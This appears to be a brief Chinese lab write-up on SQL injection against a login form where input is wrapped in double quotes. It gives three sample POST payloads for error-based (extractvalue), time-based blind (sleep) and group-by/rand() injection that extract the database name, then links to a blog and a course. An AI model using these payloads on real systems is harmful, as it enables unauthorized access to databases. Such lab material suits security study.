输入内容被放到双引号中,报错型注入,注释符不可用
方法一,报错型
样例payload
uname=admin" and extractvalue(1,concat(0x7e,(select database()))) and " &passwd=admin&submit=Submit
方法二,时间型盲注
效率低,鸡肋
样例payload
uname=admin" and if(left(database(),1)='s',sleep(3),1) --+ &passwd=admin&submit=Submit
方法三,聚合函数
具有随机性,鸡肋
样例payload
uname= " union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd=admin&submit=Submit
如有还不懂得
就到这里学习吧
(1条消息) luosaierdadi的博客_CSDN博客-领域博主https://blog.csdn.net/luosaierdadi?type=blog
(1条消息) MySQL入门技能树 (csdn.net)https://edu.csdn.net/skill/mysql?utm_source=AI_act_mysql